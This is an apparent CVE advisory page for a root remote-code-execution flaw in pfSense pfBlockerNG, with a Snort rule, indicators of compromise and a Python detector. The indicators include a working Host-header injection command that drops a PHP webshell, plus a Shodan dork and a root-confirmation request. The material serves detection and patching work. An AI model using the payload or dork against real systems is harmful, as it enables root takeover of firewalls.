CVE-2022-31814
published 2022-09-05


Priority: P1 92, critical, 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 86.45% (99.7th percentile)
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.

Affected

2 ranges
Vendor    Product      Version range   Fixed in
netgate   pfblockerng  <= 2.1.4_26     -
pfsense   pfblockerng  < 2.1.4_27      2.1.4_27

Detection & IOCs (extracted from sources)

url: /pfblockerng/www/index.php
path: /pfblockerng/www/index.php
filename: system_advanced_control.php
path: /usr/local/www/system_advanced_control.php
url: /system_advanced_control.php?c=id
command: ' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '
snort: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/pfblockerng/www/index.php"; fast_pattern; http.host; content:"|2a 3b|"; startswith; reference:url,www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/; reference:cve,2022-31814; classtype:attempted-admin; sid:2044629; rev:1; metadata:affected_product IoT, attack_target Networking_Equipment, created_at 2023_03_15, cve CVE_2022_31814, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_03_15, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes: |2a 3b|
  • Exploit sends a GET request to /pfblockerng/www/index.php with shell metacharacters (e.g., ' *; ... ;') injected into the HTTP Host header to achieve unauthenticated RCE as root.
  • The Snort/ET rule detects the attack by matching GET requests to /pfblockerng/www/index.php where the HTTP Host header starts with the bytes 0x2a 0x3b (i.e., '*;'), indicating shell metacharacter injection.
  • After successful exploitation, a PHP webshell is dropped at /usr/local/www/system_advanced_control.php and accessed via GET parameter 'c' for command execution. Presence of this file on a pfSense host is a strong indicator of compromise.
  • Successful shell upload can be confirmed by checking for 'uid=0(root) gid=0(wheel)' in the response to /system_advanced_control.php?c=id.
  • The Nuclei template confirms exploitation by checking that the initial response body to /pfblockerng/www/index.php contains 'GIF', and then verifying a DNS interaction via interactsh, indicating OOB callback from the injected Host header command.
  • Shodan dork can be used to identify exposed pfSense instances potentially running pfBlockerNG: search for http.title:"pfSense - Login" with Server: nginx and Set-Cookie: PHPSESSID=.
  • Only pfBlockerNG versions 2.1.4_26 and below are affected; version 3.x is explicitly unaffected. Ensure detection rules are scoped accordingly to avoid false positives on patched or v3.x installations.
  • pfBlockerNG is not installed by default on pfSense; the attack surface only exists on systems where the plugin has been explicitly installed.
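The following is an added example, not code from the page's sources, from Netgate or from the ET rule authors. It mirrors the Snort rule's logic in Python (GET, URI /pfblockerng/www/index.php, Host header beginning with the bytes 0x2a 0x3b) so the same check can be run over captured requests outside an IDS, and adds two things the rule does not do: a broader flag for any shell metacharacter in the Host header (for triage, since a legitimate Host never contains one), and a version check that scopes alerts to the affected range "through 2.1.4_26" as the bullets above recommend. The request samples are constructed for the example; the version-string format is assumed to be "major.minor.patch_build" as in the table above.

```python
"""Request-level detector for the CVE-2022-31814 pattern (added example).

Assumptions (not from the page): requests arrive as raw HTTP/1.1 text, e.g.
from a reverse-proxy capture; package versions look like "2.1.4_26".
"""
import re
from dataclasses import dataclass

TARGET_URI = "/pfblockerng/www/index.php"
RULE_PREFIX = b"\x2a\x3b".decode()          # "*;" as in content:"|2a 3b|"; startswith
SHELL_META = re.compile(r"[;|&`$'\"*(){}<>\n]")  # broader triage check, not the ET rule
LAST_AFFECTED = (2, 1, 4, 26)                   # "through 2.1.4_26"; 3.x unaffected


@dataclass
class Verdict:
    rule_match: bool        # exact logic of the ET/Snort signature
    suspicious_host: bool   # any shell metacharacter in the Host header
    host: str


def parse_request(raw: str):
    """Split a raw HTTP request into (method, target, headers)."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def inspect(raw: str) -> Verdict:
    """Apply the signature logic plus the broader metacharacter check."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    path = target.split("?", 1)[0]
    rule = method == "GET" and path == TARGET_URI and host.startswith(RULE_PREFIX)
    return Verdict(rule, bool(SHELL_META.search(host)), host)


def is_affected(version: str) -> bool:
    """True for pfBlockerNG versions <= 2.1.4_26 (assumed "a.b.c_d" format)."""
    parts = tuple(int(p) for p in re.split(r"[._]", version))
    return parts <= LAST_AFFECTED


# Constructed samples: one matching the signature, one ordinary login request.
MALICIOUS = (
    "GET /pfblockerng/www/index.php HTTP/1.1\r\n"
    "Host: *;echo probe\r\n"
    "User-Agent: curl/7.88.1\r\n"
    "\r\n"
)
BENIGN = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: firewall.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, inspect(req))
    for v in ("2.1.4_26", "2.1.4_27", "3.1.0_1"):
        print(v, "affected" if is_affected(v) else "not affected")
```

The `rule_match` flag is the high-confidence signal and should drive alerting; `suspicious_host` is looser and is meant for hunting across proxy logs, where a Host header containing any shell metacharacter is worth a look even when the URI differs. Pair either hit with the file IOC above (/usr/local/www/system_advanced_control.php present on the host) to confirm compromise rather than an attempt.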

CVSS provenance

nvd: v3.1, 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL